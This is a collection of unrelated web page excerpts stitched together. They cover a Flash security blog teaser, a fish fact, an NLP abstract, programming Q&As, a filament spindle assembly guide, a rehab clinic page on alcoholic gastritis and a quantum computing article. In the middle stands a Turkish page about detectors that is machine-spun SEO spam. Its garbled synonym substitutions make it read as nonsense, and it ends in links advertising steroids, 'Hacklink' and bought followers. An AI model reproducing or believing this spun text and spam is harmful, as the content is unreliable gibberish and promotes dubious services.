topic.<br /> It's the second chapter of my personal research about <a href="http://www.wisec.it/sectou.php?id=464dd35c8c5ad">Flash Application security testing</a>.<br /> Some new trick is disclosed and a <a href="http://www.mindedsecurity.com/labs/fileshare/browsers.swf"> couple</a> of <a href="http://www.mindedsecurity.com/labs/fileshare/playerV1.swf"> video</a> screencasts are now available to respectively show how a <b>flawed SWF</b> could <u>XSS</u> the hosting site, and a preview of the tool I am going to release today on behalf of <a href="http://www.mindedsecurity.com"> Minded Security</a> for SWF security analysis and testing at runtime.<br /> I hope you'll enjoy reading it!<br /> http://www.wisec.it/sectou.php?id=475578649970e Tue, 04 Dec 2007 16:42:00 GMT
Cichlid fish eggs Cichlid fish eggs There is a type of Catfish that lays its eggs among the eggs of the Cichlid fish, which carries its young in its mouth. These eggs will then hatch first inside the unwilling adoptive mother's mouth, and proceed to eat the Cichlid eggs present before being released by the Cichlid. Previous Fact Next Fact Categories: AnimalsMisc
Hui Zhou 2019 pdf Ranking-Based Autoencoder for Extreme Multi-label Classification Bingyu Wang | Li Chen | Wei Sun | Kechen Qin | Kefeng Li | Hui Zhou Proceedings of the 2019 Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Technologies, Volume 1 (Long and Short Papers) Extreme Multi-label classification (XML) is an important yet challenging machine learning task, that assigns to each instance its most relevant candidate labels from an extremely large label collection, where the numbers of labels, features and instances could be thousands or millions. XML is more and more on demand in the Internet industries, accompanied with the increasing business scale / scope and data accumulation. The extremely large label collections yield challenges such as computational complexity, inter-label dependency and noisy labeling. Many methods have been proposed to tackle these challenges, based on different mathematical formulations. In this paper, we propose a deep learning XML method, with a word-vector-based self-attention, followed by a ranking-based AutoEncoder architecture. The proposed method has three major advantages: 1) the autoencoder simultaneously considers the inter-label dependencies and the feature-label dependencies, by projecting labels and features onto a common embedding space; 2) the ranking loss not only improves the training efficiency and accuracy but also can be extended to handle noisy labeled data; 3) the efficient attention mechanism improves feature representation by highlighting feature importance. Experimental results on benchmark datasets show the proposed method is competitive to state-of-the-art methods.
Background Image Navigation with jQuery In this tutorial we are going to create a beautiful navigation that has a background image slide effect. The main idea is to have three list items that contain the same background image but with a different position. The background image for each item will be animated to slide into place in different times, creating a really nice effect. The background image sliding direction from the list item in the middle will depend on which item the user was before: coming from the right, it will slide from the left and vice versa. Similar Posts
Tell me more × Game Development Stack Exchange is a question and answer site for professional and independent game developers. It's 100% free, no registration required. I'm creating an application which allows the user to manipulate 3D models. I would like to draw 3 axis representing the world coordinate system in 3D in order to give the user an idea where he is. These axis are represented by a 3D model. Now I want these axis to be always shown at the bottom left of the screen. I know how to draw them but not how to project them at specific coordinates on the screen. How can i achieve this? EDIT: I use XNA. The axes have been created with 3DSMax, each axes is a cylinder surmounted by a cone. When I load the 3DSMax file, I get an instance of the Model class. The 3 axis looks like that. I've just tried to draw it normally and it appears at the center of the scene. After that, i don't know what to do to make it appears at the bottom left of the screen regardless of where the camera looks, as if that was part of the UI. 3DSMax has the same thing at the bottom left of each frame. share|improve this question What technologies are you using? What have you tried? How are you representing the axes by a 3D model? – Yannbane Aug 2 '12 at 13:39 I'm pretty sure that's not how you draw lines. – Yannbane Aug 2 '12 at 14:44 Takumi, put the info you just wrote in your question. – Thraka Aug 2 '12 at 16:03 2 Answers First of all pixel on the screen is a ray in your 3d world - all scene behind this pixel. Second, what you must know, that any point in 3d converted into 2d motinor space via multiplying 3 matrices: pointIn2DSpace = pointIn3DSpace * WorldMatrix * ViewMatrix * ProjectionMatrix So you can do a back conversion, multiplying "monitor" point with inverted WVP matrix: pointIn3DSpace = pointIn2DSpace * Invert(WorldMatrix * ViewMatrix * ProjectionMatrix) Now you can calculate some 3D point behind the pixel to the "depth of monitor". Let x and y will be you coordinates, than you must convert point (x, y, 0) and (x, y, 1) into 3D-space and get some ray from them. Having two point you can easily get a ray and calculate required position on this ray. Last step is just find in XNA docs where to get this matrices and do some math. Good luck. share|improve this answer Thanks for your response. But I don't understand your explanation about ray and position on the ray. I understand that a 3D point is converted in 2D screen point by doing World * View * Projection and doing the opposite will convert from 2D to 3D. I've tried to invert the WVP matrix and transform my 2D point, and set the 3D position to the matrix of my model. But it doesn't work. When I move my camera, my model moves but doesn't stay at the same position on the screen. I think i've missed something, probably what you try to explain about ray and "depth of monitor". – Takumi Aug 5 '12 at 18:47 When you convert 2D point to 3D you will get a point on "monitor plane". If you want to place object "deeper" then you must move it in direction which is perpendicular to that "monitor" frame. Now about moving - since you change position of your camera you change VIEW matrix, so you must recalculate position of your fixed object. – Yarg Aug 6 '12 at 3:20 If you want this 3D-model to be in a specific point in relation to your moving camera then just update the position when you update the camera position. If you are using XNA then just do something like: axesPos = camPos + camOri.Front * distZ + camOri.Left * distX+ camOri.Down * distY; share|improve this answer Your Answer   discard By posting your answer, you agree to the privacy policy and terms of service. Not the answer you're looking for? Browse other questions tagged or ask your own question.
Beefy Boxes and Bandwidth Generously Provided by pair Networks XP is just a number   PerlMonks   Re: Use Perl Debugger, where input is the output from shell script by LanX (Bishop) on Jul 23, 2013 at 19:29 UTC ( #1045940=note: print w/replies, xml ) Need Help?? in reply to Use Perl Debugger, where input is the output from shell script after reading the OP again... have a look at PERLDB_OPTS, especially TTY and noTTY, in perldebug#Configurable Options After the rc file is read, the debugger reads the $ENV{PERLDB_OPTS} environment variable and parses this as the remainder of a "O ..." line as one might enter at the debugger prompt. You may place the initialization options TTY , noTTY , ReadLine , and NonStop there. If your rc file contains: parse_options("NonStop=1 LineInfo=db.out AutoTrace"); then your script will run without human intervention, putting trace information into the file db.out. (If you interrupt it, you'd better reset LineInfo to devtty if you expect to see anything.) TTY The TTY to use for debugging I/O. noTTY If set, the debugger goes into NonStop mode and will not connect to a TTY. If interrupted (or if control goes to the debugger via explicit setting of $DB::signal or $DB::single from the Perl script), it connects to a TTY specified in the TTY option at startup, or to a tty found at runtime using the Term::Rendezvous module of your choice. This module should implement a method named new that returns an object with two methods: IN and OUT . These should return filehandles to use for debugging input and output correspondingly. The new method should inspect an argument containing the value of $ENV{PERLDB_NOTTY} at startup, or "$ENV{HOME}/.perldbtty$$" otherwise. This file is not inspected for proper ownership, so security hazards are theoretically possible. Cheers Rolf ( addicted to the Perl Programming Language) Log In? Username: Password: What's my password? Create A New User Node Status? node history Node Type: note [id://1045940] help Chatterbox? and all is quiet... How do I use this? | Other CB clients Other Users? Others pondering the Monastery: (8) As of 2017-12-17 10:20 GMT Sections? Information? Find Nodes? Leftovers? Voting Booth? What programming language do you hate the most? Results (463 votes). Check out past polls. Notices?
AnsweredAssumed Answered Ajax requests in a for-loop? (Blog Dashlet) Question asked by tbarg on Mar 20, 2012 Latest reply on Mar 21, 2012 by erikwinlof I'm currently modifying the Blog Dashlet to be a user dashlet that displays the blog posts from all sites of a member. I succeeded at this (the displaying part, I don't need the "create post" functionality) , but stumbled upon a few odds. If I bundle Ajax Requests in a for-loop, the loop terminates before the requests are completely processed. loadPosts: function SiteBlog_loadPosts(sites) {          for(var i = 0; i<sites.length; i++){                                     Alfresco.util.Ajax.request(          {             url: Alfresco.constants.PROXY_URI + "api/blog/site/" + sites[i] + "/blog/posts?pageSize=25",             successCallback:             {                fn: this.onPostsLoaded_Collector,                scope: this              },             failureCallback:             {                fn: this.onPostsLoadFailed,                scope: this              },             scope: this,             noReloadOnAuthFailure: true          });      } }, "sites" is an array of site names, the loop is the first step to collect posts from all the sites in "sites". I got the overall code working with a few detours, but the for-loop terminates, before the successcallback methods terminate (or run, for that matter). I don't know much about javascript, but how is that even possible? How can a loop terminate before the code within it? Is there a proper way to ensure that the loop does not terminate before the ajax requests? Outcomes
Dedektör Çeşitleri fire yahut hatalı girildi. Lütfen bu alanları düzeltip tekrar gönderelim|Haberler İpucu Haberleri Dedektör nedir Dedektör nedir Mevki altına gönderilmiş olduğu sinyallerle, değerli olarak nitelendirilen maddelerden dalgalar şeklinde sinyallerden geri bildirim meydan cihazlara dedektör denir. Selen Merkezi|Papa 15. Lui: Gazetede okumuştum mayınları da uydudan saptama ediyorlar arama motorunda bulabilirsiniz.pavlovun incilini Vatikanami verdiler onda okumuştum peyk buluyor.|Havalandırma noktası evet da radyatör yönı kabilinden yerlerde ambiyans konveksiyonu kötüın dedektöre ulaşmasını engelleyebilirken, garajlardaki susturucu kavaraı yanlış alarmlara niçin olur.|Tetebbu yapacağınız yerin zamanı güzeştei ve henüz önce bu bölgede temelı buluntuların saptama edilmiş olması selim yerde evetğunuzu alamet paha.|Geniş bantlı internet da bir insanoğlu hakkı haline gelmiş durumda. Akarsu, yalıtım ve tüketmek kabilinden mebdelıca ihtiyaçlarımızın yönı keşik vüruten dünyada evde internet bile çıktı üs lazım…|Farklı zamanlamaların seçilmesi ve sonunda hem ısı yayımı talaz formunun hem bile senkronize transfer anahtarlama sinyallerinin bileğteamültirilmesi farklı iz tipleri ve hedefler bâtınin faydalara sahiptir.|Ip teamüllemleri Bu düşünce IP’si ile atılan mesajları aralık Bu kullanıcının son IP’si ile atılan mesajları aralık Bu düşünce IP’si ile kullanıcı aralık Bu kullanıcının son IP’si ile kullanıcı aralık KAPAT X x x|Eğin düşünce sesi (eşik), maksat sinyalleri henüz kazançlı duyabilemek ve henüz etraflıca tespitler strüktürlmasına olanak katkısızlaması bakımından kullanılan dal düşünce sesidir.|Garaz ID dijital bileğerleri metal dedektör bellik ve modeline bağlamlı olarak bileğteamülkenlik gösterir.|Toprak telafisi devresi, hızlı mütebeddil ortam mineralizasyon seviyelerinden kaynaklanan yanlış sinyalleri kaldırır.|Sinyalin gidiş ve geliş hızlarını hesaplayarak mesafe üzerine bir grafik oluşturabilir. Radar kabilinden dedektörler ise aynı mantıkla çalışırlar ve bir ekranda cisimlerin istikamet ve kütleleri üzerine bilgiler iletirler.|Allıkınan sinyalde bir faz bileğteamülimi var ise bu yakınlarda bir metal evetğu fehvaına hasılat. Her metalin kendine özel bir faz kayması vardır.|O halde siz bile yukarıda sıralanan dedektor alternatifleri arasından bir kanunlar yapabilirsiniz. Ancak bunu yapmadan önce dedektörlerle alakalı kesinlikle bilmeniz gerekenleri dikkate almalkaloriız! Dedektörler ile Alakalı Bilmeniz Gerekenler} aracılığıyla hareketi fiziksel bir takas rakamı olarak rüşvetlar ve elde etmiş olduğu takas bilgisini bir yalıtım sinyali olarak dışarıya iletir. Encoderlar dört kategoriye ayrılır: mekanik, gözlükçü, manyetik ve…|hiyerarşi tekerrür pedagojik-formasyon barometre reeskont unvan hudut lavinya çıkarma vesayet|• Cihazlarının birçoğuna mehil farksız önceden fiyatına 6 taksit imkanı sunan şirket Dedektorburada.com|Smartfind dü boyutlu ayrımcılık yaparak maksimum maksat bilgisi verir, sonunda hedefler hem demir hem bile iletken özelliklerle aynı anda kocaoğlanrt edilebilir.|Dedektörler genel anlamda türap altına elektromanyetik sinyaller iletir, bu sinyallerden mevrut verileri kullanıcısına mesabe olarak gösterir.|• Hevesli ve kurumsal firmanın gerekliiğini yerine getirerek her bellik ve sistem dedektörü stoklarında erdemli adelerde bulunduran şirket Dedektorburada.com|Toparlak bobinler umumiyetle henüz kararlı, henüz erdemli performanslı ve henüz bir tomar derinliğe ulaşır.|Bunlar umumiyetle teknik haber mucip etkenlerdir ama teknik bilgisi olmayan insanoğluın da yapabileceği donanımsal ve yazılı sınavmsal etkenler vardır. Bununla beraber dedektör sinyal bileğerleri bile pozitifrılmış olacaktır.|Kayran Tarama Cihazları, geniş arazilerde ve çok derinde olabilecek temelı metal yahut zayilukların tespitinde kullanılan yardımcı önemli bir cihazdır.|Bu testler size çın aramalarda çok dem kazanmıştırracak, selim adımlar atmanıza vesile olacak ve en önemlisi elinizdeki cihazın kapasitesinin ne kadar olduğunu anlamanızı katkısızlayacak ve bu da beklentilerinizi henüz selim şekillendirecektir.|Evinizi, firmanızı yahut teamülyerinizi yangına karşı sahiplenmek, hafife alınacak bir hâlet bileğildir. Esrar dedektörleri her ne kadar ülkemizdeki dairelerde katı kesif rastlanılan cihazlar olmasa da dirim kurtarıcı oldukları bir gerçektir.|Bir metal detektörü tarafından saptama edilebilen herhangi bir metal nesnedir. Eğer saptama edilen define yahut kızıl ise bu maksat onaylama edilebilir en kazançlı hedeftir.|Dedektörler genel olarak dü farklı şekilde meydan tarama teamüllemi gerçekleştirir ve değerli madenlerin bulunmasını katkısızlar. Bunlardan biri olan kızıl kavrama topraktaki kızıl yahut başka değerli metal izlerinin tespitinde yardımcı olan bir dedektör çeşididir.|Erdoğan’ın evinin doğruında pankart açtığı bâtınin tutuklanan Kaya, 67 bin TL tazminat kazandı} {En kazançlı dedektör seçimi yaparak yerin metrelerce altındaki metal ve değerli eşyaları beklemek mı istiyorsunuz? O halde en kazançlı dedektör ile yerin kaç metre altında arama gerçekleştirebileceğinizi bileğerlendirmenin tam demı!|Iş kalitesi bâtınin çerezleri kullanabiliriz. DH’ye girerek kullanım izni vermiş sayılırsınız. Anladım Veri Politikamız|Bu tür süssüz dedektörler, katışıkşık ayarlar gerektirmemeleri ve vasat toprakların dünyalanmasına müsaade vermeleri açısından kullanışlıdır. Eksiklikler arasında, zayıf hassasiyetine ve yaş alanlarda kesif kesif yanlış alarmlara uyanıklık etmeliyiz.|Elektromanyetik alandaki herhangi bir metal nesneye (hedefe) enerji verilir ve kendi elektromanyetik meydanına yeni baştan iletir.|Bahsettiğimiz “korsan” deniz zirı aramalarıyla baş edebilir. Sadece rahatçe tebdil etmek, nemden kazançlı bir yalıtım bulmak ve curcunalı sinyalini LED ile tebdil etmek gerekir. Bu videoda nasıl çalışacak.|Mevki altına gönderilmiş olduğu sinyallerle değerli olarak nitelendirilen maddeleri dalgalar şeklinde sinyallerden geri bildirim meydan cihazlara dedektör denir. Dedektörler genel anlamda türap altına elektromanyetik sinyaller iletir, bu sinyallerden mevrut verileri kullanıcısına mesabe olarak gösterir.| Teknoloji ile beraber vüruttirilen meydan tarama dedektörleri ile türap altında kalmış birçok fosil ve zamanı eserlere, madeni eşyalar vasıl olmak emeksiz hale gelmiştir.|Bu durumda Maden Dedektörleri metal saptama ve kocaoğlanrım yetenekleri ile 3 boyutlu grafik kabilinden özellikleri yardımıyla bulduğumuz obje bâtınin budalaı yapıp yapmamaya karar vermemize kesin olarak yardımcı olacaktır.|                                                                                                                                        |Bu işlem havayı iyonlaştırır ve plakalar arasında akan bir hareket oluşturur. Esrar bu zayiluğa girerse, alfa parçızdırapklarını emer ve iyonlaşma sürecini bozar, bu da hareketı azaltır şu demek oluyor ki temek alarmında evetğu kabilinden devreyi keser ve pilli kötü dedektörünün alarmını etkinleştirir.|Yeraltı arama ve fonleme sistemlerinde modeller farklı farklı olsa da kullanılan teknoloji genel bakımından aynıdır. Bu bağlamlamda satın alacağınız dedektörlerin kötüdaki özelliklere malik olabileceğini bilmenizde fayda vardır.|Endüstriyel Tesislerde Tutkun Algılama Sistemleri Endüstriyel tesisler hummalı olarak yönıcı maddeler kabilinden enerji türleri ve hammaddeleri çitndırdığından yangın riskinin hummalı evetğu bölgelerdir.|Esrar dedektörleri yangın kavrama sisteminde bulunan eğer olmazsa gayrimümkün öğelerden bir tanesidir. Esrar dedektörleri meydana mevrut bir yangında ilk evrede tespiti yaparak firmada belirlenen sorumlulara geribildirim veren cihazdır. Bu blog tasarmızda sizlere kötü dedektörü çeşitleri üzerine haber vereceğiz.|Deneyimli kullanıcılar biricik nefis meydan tarama modellerini rahatlıkla kullanabilir ve onut etkileyecek etkenlere karşı henüz selim etüt yapabilir.} dedektör Categories Uncategorized Post Author: admin Bir cevap yazın E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir https://aksiyonsahneleri.name.tr/ https://elazigwebtasarimseo.name.tr/ https://konusmaterapisi.name.tr/ https://adanahaber.name.tr/ https://okulkantini.name.tr/ Seo Fiyatları Heets Sigara Fiyat Steroid Satın Al Steroid Sipariş Fantezi İç Giyim Hacklink takipçi satın al Puro Satın Al puff bar satın al
Filament Spindle MK1 Assembly Overview The construction of the filament spindle is very straightforward. The entire thing literally bolts together. There are no electronic components, or anything more complicated than nuts and bolts. If you can get peg A into slot B, you're good to go. Stuff You'll Need flickr:4625613946 The following things are useful for assembly but are not included: • 5lb coil of plastic • 2.5mm hex key • adhesive tape • tubing or wire cutters • 2 x 13mm wrenches The Kit Part List Filament Box Lasercut Parts flickr:4624629809 Filament Guide Tubing flickr:4625235662 Filament Box Hardware flickr:4624630849 Filament Spindle Lasercut Parts flickr:4624628533 Filament Spindle Hardware flickr:4624630299 Filament Spindle Build The spindle is the part that holds the plastic and rotates. Prepare Turntable flickr:4624626879 To make things easier for yourself now, you should attach 4 of the M3 x 16mm bolts to the turntable facing downwards. The turntable has two sides: a top and a bottom. Each side has various holes in it. The holes we are interested in are the big ones (~4mm diameter). The holes on the top side use a different spacing from the holes on the bottom side. The bottom side of the turntable is the side where the holes are closest to the the corners. Insert the bolts facing downward (away from) on the bottom part of the turntable. Put nuts on them and tighten them all the way down. If you are using just the filament spindle, these will become your spindle legs. If you are using the spindle box, these will fit into holes in the box to keep the spindle in place. Attach Turntable to Bottom Flange flickr:4625232756 Grab the circular flange from the kit with the extra holes on it and bolt the top side of the turntable to it. Make sure to tighten it down nicely as it will become difficult later. This is the bottom flange. Put it away for now. Attach Spokes to Top Flange flickr:4625232186 Using the second flange from the kit, attach the spokes to the flange. Don't try to do them all at once because they will definitely fall out. This is the top flange. Tape Nuts in Place flickr:4624624911 Insert nuts into the top t-slot for each spoke. Tape it into place with a piece of tape. We used scotch tape, but almost any kind of tape will do. This is very important if you want to get the top flange on without getting frustrated. Load Filament flickr:4624624193 Carefully place the filament spool over the spokes. This can be a bit tricky, but it should fit. Make sure that all of the plastic is outside the spokes and that none of it is inside. Do not cut or remove the twisty ties keeping your filament spool nice and tidy. That will be one of our last steps and keep everything simple. Attach Bottom Flange flickr:4625009077 This is probably one of the most difficult parts of the build. It may take you a few tries, but it is definitely possible. It helps if you have a friend who can help you manoeuvre. The basic idea is to get the top flange over all of the spokes and then bolt it into place. In practice, the spokes will not be perfectly aligned and you will have to wiggle them into place one at a time. Start with the spoke to the far side of you, and then get the spoke to either side. Continue on alternating sides until you have all of the spokes in the proper slot on the flange. Hold this down firmly until you have a bolt or two in. Once you have the flange on, bolt them all down. Do not bolt it down until all the spokes are in their slots as this will cause you problems. Filament Box Build The box is an important part of the filament spindle. It keeps your filament clean and dust-free. It provides a safe enclosure for your plastic so it doesn't spill all over. It also can be sealed to keep moisture out. Add a Bit of Flair flickr:4624627901 The front of the box is made from lasercut acrylic. The acrylic comes with a protective paper film. Instead of just peeling it off and throwing this away, you can make it look nice. In this example, we colored the whole area in. Results of Flair Adding flickr:4625233914 When we peeled off the protective paper, the lettering was left behind. If you wanted to be more permanent, you could peel the letters away first and then spraypaint it. Assemble The Sides flickr:4624622449 The first step is to assemble the sides as shown. The acrylic piece should form the front of the box. Insert nuts and bolts and give them a decent tightening. Attach Spindle to Bottom flickr:4625227744 Its time to insert your spindle. Place the spindle upside down so the screws are facing upwards. Place the bottom piece onto the spindle. You may have to wiggle it a bit. Once the spindle is in, you should use nuts on the bottom to securely bolt it into place. Attach the Bottom to the Sides flickr:4625226690 Once you have the sides, attach the bottom to them. The top and bottom are symmetrical, so you have your choice of where to put the filament guide holes. We prefer to put them in to back right corner as pictured. Bolt and tighten all the screws down. Attach the Feet to the Bottom flickr:4625227204 We have included some self-adhesive, grippy feet for your filament spindle. This will keep it from sliding and will reduce vibration induced noise. Attach them as close to the corners as you can get. Secure the Dessicant flickr:4624619707 If you plan on sealing your box, placing some dessicant into the box will keep your filament nice and dry. Tape it into a back corner that is not next to the guide hole. Do not tape the dessicant to the middle of the sides. Seal the Box flickr:4625007945 This part is optional, but will keep your filament from getting dirty and absorbing water. Take a hot glue gun (or perhaps silicone sealant) and put a bead of it along all the edges of the box. You should probably seal up all the t-slot openings as well (except for the ones on top which you still need to insert nuts for.) Attach Quick Connect Coupling flickr:4624619165 The filament spindle uses quick connect couplings for simplicity on the filament guide tubing. Grab the box top and pick a hole and insert the coupling into. Grab your 13mm wrenches and bolt it on. Cut Twisty Ties flickr:4624618537 Since the next step is to route the filament, its time to cut the twisty ties. Locate the outside/beginning end of the filament and put it into one of the empty t-slots to hold it into place. Next, cut all the twisty ties with a pair of wire clippers. Be careful that you don't cut any of the filament as that could really mess things up. If you have small hands, you could probably also untwist the ties. Attach Top flickr:4625224496 To avoid hassle, it's a good idea to tape the captive nuts for the top into place before you attach the top. As you are placing the top onto the filament box, route the filament through the quick connect coupling. Slowly pull a couple feet out so it doesn't slip back in. Snap the top into place over the tabs, making sure that the filament guide holes in the top line up with the filament guide cutout in the bottom. Push it down over the tabs. It is not strictly necessary to bolt the top into place. The friction of the tabs and gravity will keep it from falling off. You may want to opt out of bolting it into place, at least at the beginning. Your filament spindle is most likely to jam in the very beginning when there is lots of filament and it is much easier to fix if the top pops off. Measure and Cut Guide Tubing flickr:4625008305 The guide tubing is a very smooth and durable plastic called HDPE (same stuff milk jugs are made from). The purpose of this tubing is twofold: it redirects the feed forces and it keeps the filament nice and clean. The tubing length should be 750mm + (# of spindles-1)*150mm. If its a little bit too long that is okay. Essentially, you want a nice smooth curve that does not interfere with anything when the extruder is at the very top and the very bottom of its travel. If you don't want to measure the tubing, here is a little table of lengths: # of Spindles Tubing Length 1 750mm 2 900mm 3 1050mm The best way to cut the tubing is with a tubing cutter. Since that's not a very common item, you can alternatively use a sharp knife, or less ideally, some wire cutters. Once you cut the tubing, inspect the end to make sure it is still circular. If it isn't, use something like a Phillips head screwdriver to give it a round shape again. Thread and Attach Tubing flickr:4625223480 Once your tubing is cut, you can attach it to the spindle box. At the same time you do this, thread filament through the tubing so it sticks out the end. Bend a small 'L' into the end so it doesn't slip out. To attach the tubing, simply press it into the quick connect part. It will lock into place. You can freely rotate the tubing for proper orientation to your MakerBot without removing it. If you with to remove it, simply push down on the colored ring on the outside of the quick connect and pull on the tubing. Connect to MakerBot flickr:4625222284 The best place for your filament spindle is underneath your MakerBot. The vibrations coming from your MakerBot will reduce pressure buildup and prevent jams from happening. Place your MakerBot on your filament spindle and run the filament into the extruder. As the filament gets pulled into the extruder, it will pull the tubing along for the ride. When the tubing hits the top of the extruder, it will redirect the force and the plastic will then start pulling from the spindle itself. This is a self-aligning system which is very nice. You're Done! flickr:4625221628 You may want to revisit the main page to view more information on usage. Enjoy your new filament spindle and happy printing! Unless otherwise stated, the content of this page is licensed under GNU Free Documentation License.
Alcohol-Induced Gastritis Symptoms & Treatment alcoholic gastritis internal camera image Alcoholic gastritis comes about when excessive amounts of alcohol are regularly consumed by an individual and is usually a symptom of alcohol addiction. It can be a very painful condition that also leads to long-lasting severe health problems. Treatment for alcohol-induced gastritis is available, and the sooner you act, the more damage you can prevent.  If you are suffering with alcohol addiction, contact us to see how we can help you. Rehab or detoxing are usually the most recommended action. What is alcoholic gastritis? To understand alcoholic gastritis we need to look at gastritis itself. This is a health condition where your stomach lining has essentially been eroded away. There are lots of things that can cause gastritis, and alcohol is one of them.  Alcohol-induced gastritis is where alcohol has attacked your stomach lining. In moderation, alcohol won’t cause long-lasting damage to your stomach. You may get an upset feeling after a night of heavy drinking, but this will fade within a day. However, if you consume alcohol all the time, then the sheer amount of it in your body will target the stomach lining and cause it to become very irritated.  What are the symptoms of Alcoholic Gastritis? Unfortunately, stomach pain is quite common for many people who drink alcohol. In some cases, it’s not alcoholic gastritis and merely a bad reaction to what you drank the night before. So, how do you know if you’re suffering from alcoholic gastritis?  Here are the main symptoms of alcoholic gastritis: • Persistent stabbing pain in your stomach area • A burning sensation in your abdominal region • Pain gets worse after eating or drinking • Frequent vomiting • Blood in your vomit • Acid reflux • General irritated feeling in your stomach It’s very important that you keep an eye out for these symptoms as you need to address alcohol-induced gastritis right away. When left for too long, it can cause severe health complications.  man with alcoholic gastritis What happens when left untreated? If you leave this untreated, then it’s possible the problem will keep getting worse until stomach ulcers develop and you have internal bleeding. This is known as a condition called erosive gastritis, and it can cause dizziness, blood in your stool or vomit, and severe weakness.   You also have an increased risk of developing tumours in your stomach if you have alcoholic gastritis and don’t treat it.  How do you treat alcoholic gastritis? Treating this problem needs to start by acknowledging the cause of it. Alcohol-induced gastritis is typically caused by binge drinking. As such, the chances are you may also suffer from alcohol addiction if you experience the symptoms of gastritis regularly.  In which case, an alcohol detox can help you treat both problems. Ridding your body of alcohol will help your stomach begin its natural healing process without triggering the symptoms again. At our rehab clinic, we can provide assistance to help you get through your detox as easily as possible.  Further treatment for alcoholic gastritis includes special types of medication to heal the stomach lining, and improved nutritional habits. If you avoid eating trigger foods, then your stomach can recover quicker and be back to normal before you know it.  Don’t leave alcohol-induced gastritis untreated for too long. Recognise the symptoms, then seek treatment for it right away.  If you are living with someone dealing with alcohol addiction, find out how you can help to support them. Latest News FREE CONSULTATION Get a no-obligation confidential advice from our medical experts today Request a call back
A Smidgen of Quantum Computing Article Index  By using the superposition of states a quantum computer can, in theory, contain all solutions to a problem simultaneously. An easy way to understand this process is to use the Many Worlds interpretation of quantum mechanics. While I don't really endorse this interpretation (I lean more toward the Transactional interpretation), it does provide an easy way to understand what happens to all the quantum states when a quantum object "decoheres" into one particular state. The many worlds interpretation basically says each time a quantum object takes on a definite state, each possible state splits off into it's own universe. Thus, if you consider the picture above as a quantum object, it will create one of two universes when it is measured or viewed. That is, we would look at it and see one or the other interpretation each occurring in its own universe, a bit heady when you think about how many alternate worlds there are with other versions of "you" in them. If we leave out the head spinning issues of the many worlds interpretation, we can use it as a clever way to think about quantum computers. That is, the multiple solutions held in the superposition of states are each a separate universe. Thus, a quantum parallel calculation is like running the calculation in many universes at the same time, each one holding a solution (state) of the quantum computer. The ultimate parallel computer, to be sure. One final topic that we need to cover is the Heisenberg Uncertainty Principle. In plain English, we can not know both position and momentum of a quantum object. The more we define one property, the less we know about the another. The wave/particle duality found in quantum objects is a good example. Consider the length or position of a standing wave: if we try and smash the wave into a point particle, the frequency increases to infinity. Thus, we can know the exact energy of a standing wave, but the position is smeared out. Conversely, we can know the exact position of the wave, but the energy has gone to infinity. This effect is used to explain quantum tunneling, where quantum objects are known to move through small but real barriers that would be impossible for classical objects. The tunnel diode is a commercial example of this effect. Getting back to the original press release from D-Wave, is this a true quantum computer? The question is important, because if it is, there could be some problems for many well known cryptography systems. In 1995, Peter Shor surprised the cryptology community by proposing a quantum algorithm that can be used to rapidly factor large numbers. Take for example, public/private key encryption such as RSA, which is used for encrypted web data (ssh) and many commercial transactions (SSL). To crack such a system, you would need the public key and a very fast computer to determine the private key, which is used to decrypt the message. Keys can be made stronger by increasing their size, thus, large keys are much harder to crack than small ones. With our current computer technology, cracking large keys is computational intractable (i.e. it will take too long even with all the computers on the planet). All this changes with a quantum computer that can run Shor's algorithm. It has been shown that a quantum computer with a sufficient number of qbits can crack any commonly used RSA key in a mater of seconds. Large key values do not help much. All is not lost, however, there are some encryption methods that hold up better to quantum attacks (for now). Someone possessing a true quantum computer would basically render much of the world's encryption mechanisms obsolete. Fortunately, that does not seem to be the case. The aforementioned press release states that Lockheed Martin has purchased a D-Wave quantum computer (I have emphasized quantum computer because D-Wave previously sold a system to Google, but did not call it a quantum computer). Specifically, D-Wave is calling it a quantum annealing processor, which requires a further bit of explanation. Simulated Annealing is an optimization algorithm for classical computers. One of the key issues with optimization is the trade off between computation time and the quality of solution. Some problems may even be computationally intractable and yet have a known solution. Simulated annealing is a method that allows optimization of hard problems within a reasonable time, but does not guarantee the best result (it will find an optimum solution, but it may not be the best solution). Quantum simulated annealing uses the tunneling effect to find maxima that may otherwise may be harder to find using classical methods. In other words, using quantum tunneling it is possible to find better optimizations faster. The D-Wave system uses eight qbits to perform these optimizations. Thus, the interest from a company like Lockheed Martin, who spend a great deal of time maximizing and minimizing things. When D-Wave announced the sale of their first quantum annealing computer, there were questions about whether their system actually exploits quantum annealing, or just performs classical simulated annealing. D-Wave recently published a paper in Nature that supports the quantum annealing effects, but there is a large amount of discussion as to whether it is a true quantum computer. Scott Aaronson, an Associate Professor of Electrical Engineering and Computer Science at MIT, has been critical of some of the claims made by D-Wave. There is also an interview in Forbes that will help shed some light on Aaronson's concerns. Recently, in January of 2012, DWave announced the use of 84 qbits to solve a rather complicated math problem. You can balance the progress with further comments from Aaronson's blog. Hopefully, the background provide herein will allow you make some sense of these discussions now and in the future. There will undoubtedly be more developments in this field and the prospect of true quantum computers is a mind-boggling possibility. In summary, your silicon bits (and passwords) are safe for now. In my opinion, true quantum computing is still living happily in the future. At least in this universe. Search Login And Newsletter Create an account to access exclusive content, comment on articles, and receive our newsletters. Feedburner Share The Bananas Creative Commons License ©2005-2015 Copyright Seagrove LLC, Some rights reserved. Except where otherwise noted, this site is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 2.5 License. The Cluster Monkey Logo and Monkey Character are Trademarks of Seagrove LLC.
